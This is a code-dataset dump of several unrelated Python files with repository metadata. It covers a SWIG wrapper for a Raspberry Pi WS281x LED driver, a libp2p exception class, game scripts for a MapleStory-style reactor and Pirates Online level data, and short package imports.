7391b1751334c485feea212a80abc4dc8430dc1e
|
[
"BSD-3-Clause"
] | 4
|
2021-07-15T07:34:30.000Z
|
2022-03-30T08:23:46.000Z
|
Data_loader/__init__.py
|
Gorilla-Lab-SCUT/OrthDNNs
|
7391b1751334c485feea212a80abc4dc8430dc1e
|
[
"BSD-3-Clause"
] | 1
|
2020-02-11T10:55:46.000Z
|
2020-02-11T10:55:46.000Z
|
Data_loader/__init__.py
|
Yuxin-Wen/OrthDNNs
|
7391b1751334c485feea212a80abc4dc8430dc1e
|
[
"BSD-3-Clause"
] | 1
|
2021-11-23T03:31:09.000Z
|
2021-11-23T03:31:09.000Z
|
from . import Data_loader
| 13
| 25
| 0.807692
| 4
| 26
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 26
| 1
| 26
| 26
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
269b2cbd75b429cf7d826f525f6550f5e4ca0eb6
| 98
|
py
|
Python
|
libp2p/security/exceptions.py
|
swedneck/py-libp2p
|
85457fa308100ed0e5802849bf3918ffae486239
|
[
"Apache-2.0",
"MIT"
] | 315
|
2019-02-13T01:29:09.000Z
|
2022-03-28T13:44:07.000Z
|
libp2p/security/exceptions.py
|
pipermerriam/py-libp2p
|
379a157d6b67e86a616b2458af519bbe5fb26a51
|
[
"Apache-2.0",
"MIT"
] | 249
|
2019-02-22T05:00:07.000Z
|
2022-03-29T16:30:46.000Z
|
libp2p/security/exceptions.py
|
ralexstokes/py-libp2p
|
5144ab82894623969cb17baf0d4c64bd0a274068
|
[
"Apache-2.0",
"MIT"
] | 77
|
2019-02-24T19:45:17.000Z
|
2022-03-30T03:20:09.000Z
|
from libp2p.exceptions import BaseLibp2pError
class HandshakeFailure(BaseLibp2pError):
pass
| 16.333333
| 45
| 0.826531
| 9
| 98
| 9
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035294
| 0.132653
| 98
| 5
| 46
| 19.6
| 0.917647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
26bf63467b3727e5b69099c0adfcc1778b9c0d0e
| 17,649
|
py
|
Python
|
ledcontrol/driver/ledcontrol_rpi_ws281x_driver.py
|
JosephAntony1/led-control
|
4dc49c5b57bb6fb66b00aac05b692ddabb857d6e
|
[
"MIT"
] | null | null | null |
ledcontrol/driver/ledcontrol_rpi_ws281x_driver.py
|
JosephAntony1/led-control
|
4dc49c5b57bb6fb66b00aac05b692ddabb857d6e
|
[
"MIT"
] | null | null | null |
ledcontrol/driver/ledcontrol_rpi_ws281x_driver.py
|
JosephAntony1/led-control
|
4dc49c5b57bb6fb66b00aac05b692ddabb857d6e
|
[
"MIT"
] | null | null | null |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 4.0.2
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError("Python 2.7 or later required")
# Import the low-level C/C++ module
if __package__ or "." in __name__:
from . import _ledcontrol_rpi_ws281x_driver
else:
import _ledcontrol_rpi_ws281x_driver
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
def _swig_setattr_nondynamic_instance_variable(set):
def set_instance_attr(self, name, value):
if name == "thisown":
self.this.own(value)
elif name == "this":
set(self, name, value)
elif hasattr(self, name) and isinstance(getattr(type(self), name), property):
set(self, name, value)
else:
raise AttributeError("You cannot add instance attributes to %s" % self)
return set_instance_attr
def _swig_setattr_nondynamic_class_variable(set):
def set_class_attr(cls, name, value):
if hasattr(cls, name) and not isinstance(getattr(cls, name), property):
set(cls, name, value)
else:
raise AttributeError("You cannot add class attributes to %s" % cls)
return set_class_attr
def _swig_add_metaclass(metaclass):
"""Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class _SwigNonDynamicMeta(type):
"""Meta class to enforce nondynamic attributes (no new attributes) for a class"""
__setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)
WS2811_TARGET_FREQ = _ledcontrol_rpi_ws281x_driver.WS2811_TARGET_FREQ
SK6812_STRIP_RGBW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_RGBW
SK6812_STRIP_RBGW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_RBGW
SK6812_STRIP_GRBW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_GRBW
SK6812_STRIP_GBRW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_GBRW
SK6812_STRIP_BRGW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_BRGW
SK6812_STRIP_BGRW = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP_BGRW
SK6812_SHIFT_WMASK = _ledcontrol_rpi_ws281x_driver.SK6812_SHIFT_WMASK
WS2811_STRIP_RGB = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_RGB
WS2811_STRIP_RBG = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_RBG
WS2811_STRIP_GRB = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_GRB
WS2811_STRIP_GBR = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_GBR
WS2811_STRIP_BRG = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_BRG
WS2811_STRIP_BGR = _ledcontrol_rpi_ws281x_driver.WS2811_STRIP_BGR
WS2812_STRIP = _ledcontrol_rpi_ws281x_driver.WS2812_STRIP
SK6812_STRIP = _ledcontrol_rpi_ws281x_driver.SK6812_STRIP
SK6812W_STRIP = _ledcontrol_rpi_ws281x_driver.SK6812W_STRIP
class ws2811_channel_t(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
gpionum = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gpionum_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gpionum_set)
invert = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_invert_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_invert_set)
count = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_count_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_count_set)
strip_type = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_strip_type_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_strip_type_set)
leds = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_leds_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_leds_set)
brightness = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_brightness_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_brightness_set)
wshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_wshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_wshift_set)
rshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_rshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_rshift_set)
gshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gshift_set)
bshift = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_bshift_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_bshift_set)
gamma = property(_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gamma_get, _ledcontrol_rpi_ws281x_driver.ws2811_channel_t_gamma_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_ws2811_channel_t())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_ws2811_channel_t
# Register ws2811_channel_t in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.ws2811_channel_t_swigregister(ws2811_channel_t)
class ws2811_t(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
render_wait_time = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_render_wait_time_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_render_wait_time_set)
device = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_device_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_device_set)
rpi_hw = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_rpi_hw_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_rpi_hw_set)
freq = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_freq_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_freq_set)
dmanum = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_dmanum_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_dmanum_set)
channel = property(_ledcontrol_rpi_ws281x_driver.ws2811_t_channel_get, _ledcontrol_rpi_ws281x_driver.ws2811_t_channel_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.ws2811_t_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_ws2811_t())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_ws2811_t
# Register ws2811_t in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.ws2811_t_swigregister(ws2811_t)
WS2811_SUCCESS = _ledcontrol_rpi_ws281x_driver.WS2811_SUCCESS
WS2811_ERROR_GENERIC = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_GENERIC
WS2811_ERROR_OUT_OF_MEMORY = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_OUT_OF_MEMORY
WS2811_ERROR_HW_NOT_SUPPORTED = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_HW_NOT_SUPPORTED
WS2811_ERROR_MEM_LOCK = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MEM_LOCK
WS2811_ERROR_MMAP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MMAP
WS2811_ERROR_MAP_REGISTERS = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MAP_REGISTERS
WS2811_ERROR_GPIO_INIT = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_GPIO_INIT
WS2811_ERROR_PWM_SETUP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_PWM_SETUP
WS2811_ERROR_MAILBOX_DEVICE = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_MAILBOX_DEVICE
WS2811_ERROR_DMA = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_DMA
WS2811_ERROR_ILLEGAL_GPIO = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_ILLEGAL_GPIO
WS2811_ERROR_PCM_SETUP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_PCM_SETUP
WS2811_ERROR_SPI_SETUP = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_SPI_SETUP
WS2811_ERROR_SPI_TRANSFER = _ledcontrol_rpi_ws281x_driver.WS2811_ERROR_SPI_TRANSFER
WS2811_RETURN_STATE_COUNT = _ledcontrol_rpi_ws281x_driver.WS2811_RETURN_STATE_COUNT
def ws2811_init(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_init(ws2811)
def ws2811_fini(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_fini(ws2811)
def ws2811_render(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_render(ws2811)
def ws2811_wait(ws2811):
return _ledcontrol_rpi_ws281x_driver.ws2811_wait(ws2811)
def ws2811_get_return_t_str(state):
return _ledcontrol_rpi_ws281x_driver.ws2811_get_return_t_str(state)
def ws2811_set_custom_gamma_factor(ws2811, gamma_factor):
return _ledcontrol_rpi_ws281x_driver.ws2811_set_custom_gamma_factor(ws2811, gamma_factor)
class color_hsv(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
hue = property(_ledcontrol_rpi_ws281x_driver.color_hsv_hue_get, _ledcontrol_rpi_ws281x_driver.color_hsv_hue_set)
h = property(_ledcontrol_rpi_ws281x_driver.color_hsv_h_get, _ledcontrol_rpi_ws281x_driver.color_hsv_h_set)
saturation = property(_ledcontrol_rpi_ws281x_driver.color_hsv_saturation_get, _ledcontrol_rpi_ws281x_driver.color_hsv_saturation_set)
sat = property(_ledcontrol_rpi_ws281x_driver.color_hsv_sat_get, _ledcontrol_rpi_ws281x_driver.color_hsv_sat_set)
s = property(_ledcontrol_rpi_ws281x_driver.color_hsv_s_get, _ledcontrol_rpi_ws281x_driver.color_hsv_s_set)
value = property(_ledcontrol_rpi_ws281x_driver.color_hsv_value_get, _ledcontrol_rpi_ws281x_driver.color_hsv_value_set)
val = property(_ledcontrol_rpi_ws281x_driver.color_hsv_val_get, _ledcontrol_rpi_ws281x_driver.color_hsv_val_set)
v = property(_ledcontrol_rpi_ws281x_driver.color_hsv_v_get, _ledcontrol_rpi_ws281x_driver.color_hsv_v_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_hsv_raw_get, _ledcontrol_rpi_ws281x_driver.color_hsv_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_hsv_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_hsv())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_hsv
# Register color_hsv in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_hsv_swigregister(color_hsv)
class color_hsv_float(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
hue = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_hue_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_hue_set)
h = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_h_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_h_set)
saturation = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_saturation_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_saturation_set)
sat = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_sat_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_sat_set)
s = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_s_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_s_set)
value = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_value_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_value_set)
val = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_val_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_val_set)
v = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_v_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_v_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_hsv_float_raw_get, _ledcontrol_rpi_ws281x_driver.color_hsv_float_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_hsv_float_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_hsv_float())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_hsv_float
# Register color_hsv_float in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_hsv_float_swigregister(color_hsv_float)
class color_rgb(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
red = property(_ledcontrol_rpi_ws281x_driver.color_rgb_red_get, _ledcontrol_rpi_ws281x_driver.color_rgb_red_set)
r = property(_ledcontrol_rpi_ws281x_driver.color_rgb_r_get, _ledcontrol_rpi_ws281x_driver.color_rgb_r_set)
green = property(_ledcontrol_rpi_ws281x_driver.color_rgb_green_get, _ledcontrol_rpi_ws281x_driver.color_rgb_green_set)
g = property(_ledcontrol_rpi_ws281x_driver.color_rgb_g_get, _ledcontrol_rpi_ws281x_driver.color_rgb_g_set)
blue = property(_ledcontrol_rpi_ws281x_driver.color_rgb_blue_get, _ledcontrol_rpi_ws281x_driver.color_rgb_blue_set)
b = property(_ledcontrol_rpi_ws281x_driver.color_rgb_b_get, _ledcontrol_rpi_ws281x_driver.color_rgb_b_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_rgb_raw_get, _ledcontrol_rpi_ws281x_driver.color_rgb_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_rgb_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_rgb())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_rgb
# Register color_rgb in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_rgb_swigregister(color_rgb)
class color_rgb_float(object):
thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
__repr__ = _swig_repr
red = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_red_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_red_set)
r = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_r_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_r_set)
green = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_green_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_green_set)
g = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_g_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_g_set)
blue = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_blue_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_blue_set)
b = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_b_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_b_set)
raw = property(_ledcontrol_rpi_ws281x_driver.color_rgb_float_raw_get, _ledcontrol_rpi_ws281x_driver.color_rgb_float_raw_set)
def __init__(self):
_ledcontrol_rpi_ws281x_driver.color_rgb_float_swiginit(self, _ledcontrol_rpi_ws281x_driver.new_color_rgb_float())
__swig_destroy__ = _ledcontrol_rpi_ws281x_driver.delete_color_rgb_float
# Register color_rgb_float in _ledcontrol_rpi_ws281x_driver:
_ledcontrol_rpi_ws281x_driver.color_rgb_float_swigregister(color_rgb_float)
def ws2811_channel_get(ws, channelnum):
return _ledcontrol_rpi_ws281x_driver.ws2811_channel_get(ws, channelnum)
def ws2811_led_get(channel, lednum):
return _ledcontrol_rpi_ws281x_driver.ws2811_led_get(channel, lednum)
def ws2811_led_set(channel, lednum, color):
return _ledcontrol_rpi_ws281x_driver.ws2811_led_set(channel, lednum, color)
def unpack_rgb(_in):
return _ledcontrol_rpi_ws281x_driver.unpack_rgb(_in)
def pack_rgbw(r, g, b, w):
return _ledcontrol_rpi_ws281x_driver.pack_rgbw(r, g, b, w)
def scale_8(a, b):
return _ledcontrol_rpi_ws281x_driver.scale_8(a, b)
def clamp(d, min, max):
return _ledcontrol_rpi_ws281x_driver.clamp(d, min, max)
def blackbody_to_rgb(kelvin):
return _ledcontrol_rpi_ws281x_driver.blackbody_to_rgb(kelvin)
def blackbody_correction_rgb(rgb, kelvin):
return _ledcontrol_rpi_ws281x_driver.blackbody_correction_rgb(rgb, kelvin)
def render_hsv2rgb_rainbow_float(hsv, corr_rgb, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.render_hsv2rgb_rainbow_float(hsv, corr_rgb, saturation, brightness, gamma, has_white)
def render_rgb_float(rgb, corr_rgb, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.render_rgb_float(rgb, corr_rgb, saturation, brightness, gamma, has_white)
def ws2811_hsv_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.ws2811_hsv_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white)
def ws2811_rgb_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white):
return _ledcontrol_rpi_ws281x_driver.ws2811_rgb_render_array_float(ws, channel, values, count, correction, saturation, brightness, gamma, has_white)
def float_to_int_1000(t):
return _ledcontrol_rpi_ws281x_driver.float_to_int_1000(t)
def float_to_int_1000_mirror(t):
return _ledcontrol_rpi_ws281x_driver.float_to_int_1000_mirror(t)
def wave_pulse(t, duty_cycle):
return _ledcontrol_rpi_ws281x_driver.wave_pulse(t, duty_cycle)
def wave_triangle(t):
return _ledcontrol_rpi_ws281x_driver.wave_triangle(t)
def wave_sine(t):
return _ledcontrol_rpi_ws281x_driver.wave_sine(t)
def wave_cubic(t):
return _ledcontrol_rpi_ws281x_driver.wave_cubic(t)
def plasma_sines(x, y, t, coeff_x, coeff_y, coeff_x_y, coeff_dist_xy):
return _ledcontrol_rpi_ws281x_driver.plasma_sines(x, y, t, coeff_x, coeff_y, coeff_x_y, coeff_dist_xy)
def plasma_sines_octave(x, y, t, octaves, lacunarity, persistence):
return _ledcontrol_rpi_ws281x_driver.plasma_sines_octave(x, y, t, octaves, lacunarity, persistence)
def fade(t):
return _ledcontrol_rpi_ws281x_driver.fade(t)
def lerp(t, a, b):
return _ledcontrol_rpi_ws281x_driver.lerp(t, a, b)
def grad(hash, x, y, z):
return _ledcontrol_rpi_ws281x_driver.grad(hash, x, y, z)
def perlin_noise_3d(x, y, z):
return _ledcontrol_rpi_ws281x_driver.perlin_noise_3d(x, y, z)
def fbm_noise_3d(x, y, z, octaves, lacunarity, persistence):
return _ledcontrol_rpi_ws281x_driver.fbm_noise_3d(x, y, z, octaves, lacunarity, persistence)
cvar = _ledcontrol_rpi_ws281x_driver.cvar
debug = cvar.debug
| 56.567308
| 153
| 0.840614
| 2,609
| 17,649
| 5.029513
| 0.097739
| 0.194178
| 0.283798
| 0.373419
| 0.794848
| 0.742798
| 0.652797
| 0.575446
| 0.354214
| 0.273434
| 0
| 0.075481
| 0.096209
| 17,649
| 311
| 154
| 56.749196
| 0.747163
| 0.042325
| 0
| 0.108225
| 1
| 0
| 0.01493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.194805
| false
| 0
| 0.025974
| 0.142857
| 0.705628
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
26cbbfb7f976b07d0b7e861760295acf5e84ff9f
| 371
|
py
|
Python
|
scripts/reactor/easyhontaleBoss.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/reactor/easyhontaleBoss.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/reactor/easyhontaleBoss.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# Easy horntail gem
sm.spawnMob(8810202, 95, 260, False)
sm.spawnMob(8810203, 95, 260, False)
sm.spawnMob(8810204, 95, 260, False)
sm.spawnMob(8810205, 95, 260, False)
sm.spawnMob(8810206, 95, 260, False)
sm.spawnMob(8810207, 95, 260, False)
sm.spawnMob(8810208, 95, 260, False)
sm.spawnMob(8810209, 95, 260, False)
sm.spawnMob(8810214, 95, 260, False)
sm.removeReactor()
| 33.727273
| 36
| 0.735849
| 59
| 371
| 4.627119
| 0.305085
| 0.32967
| 0.32967
| 0.395604
| 0.586081
| 0
| 0
| 0
| 0
| 0
| 0
| 0.326284
| 0.107817
| 371
| 11
| 37
| 33.727273
| 0.498489
| 0.045822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f859e46592fe82127e26d25296c7b571674dc3d5
| 1,146
|
py
|
Python
|
pirates/leveleditor/worldData/GameAreaSandboxCaveA.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 81
|
2018-04-08T18:14:24.000Z
|
2022-01-11T07:22:15.000Z
|
pirates/leveleditor/worldData/GameAreaSandboxCaveA.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 4
|
2018-09-13T20:41:22.000Z
|
2022-01-08T06:57:00.000Z
|
pirates/leveleditor/worldData/GameAreaSandboxCaveA.py
|
Willy5s/Pirates-Online-Rewritten
|
7434cf98d9b7c837d57c181e5dabd02ddf98acb7
|
[
"BSD-3-Clause"
] | 26
|
2018-05-26T12:49:27.000Z
|
2021-09-11T09:11:59.000Z
|
from pandac.PandaModules import Point3, VBase3
objectStruct = {'Objects': {'1163554532.64sdnaik': {'Type': 'Island Game Area','Name': 'GameAreaSandboxCaveA','Objects': {'1163718959.63sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_1','Hpr': VBase3(90.0, 0.0, 0.0),'Pos': Point3(520.909, -421.176, 52.838),'Scale': VBase3(1.0, 1.0, 1.0)},'1163718959.64sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_2','Hpr': VBase3(-90.0, 0.0, 0.0),'Pos': Point3(513.096, 103.973, 87.856),'Scale': VBase3(1.0, 1.0, 1.0)},'1163718959.66sdnaik': {'Type': 'Locator Node','Name': 'portal_interior_3','Hpr': VBase3(1.188, -1.45, -0.338),'Pos': Point3(105.468, -363.345, 0.358),'Scale': VBase3(1.0, 1.0, 1.0)}},'Visual': {'Model': 'models/caves/cave_a_zero'}}},'Node Links': [],'Layers': {},'ObjectIds': {'1163554532.64sdnaik': '["Objects"]["1163554532.64sdnaik"]','1163718959.63sdnaik': '["Objects"]["1163554532.64sdnaik"]["Objects"]["1163718959.63sdnaik"]','1163718959.64sdnaik': '["Objects"]["1163554532.64sdnaik"]["Objects"]["1163718959.64sdnaik"]','1163718959.66sdnaik': '["Objects"]["1163554532.64sdnaik"]["Objects"]["1163718959.66sdnaik"]'}}
| 573
| 1,099
| 0.673647
| 156
| 1,146
| 4.897436
| 0.391026
| 0.02356
| 0.02356
| 0.031414
| 0.45288
| 0.287958
| 0.158377
| 0.158377
| 0.136126
| 0.065445
| 0
| 0.265005
| 0.054974
| 1,146
| 2
| 1,099
| 573
| 0.440443
| 0
| 0
| 0
| 0
| 0
| 0.568439
| 0.228422
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
f8cc4fce6f05b9e04e50b39d786edb012e3a2736
| 55
|
py
|
Python
|
enthought/traits/protocols/generate.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/traits/protocols/generate.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/traits/protocols/generate.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from traits.protocols.generate import *
| 18.333333
| 39
| 0.8
| 7
| 55
| 6.285714
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 55
| 2
| 40
| 27.5
| 0.916667
| 0.218182
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
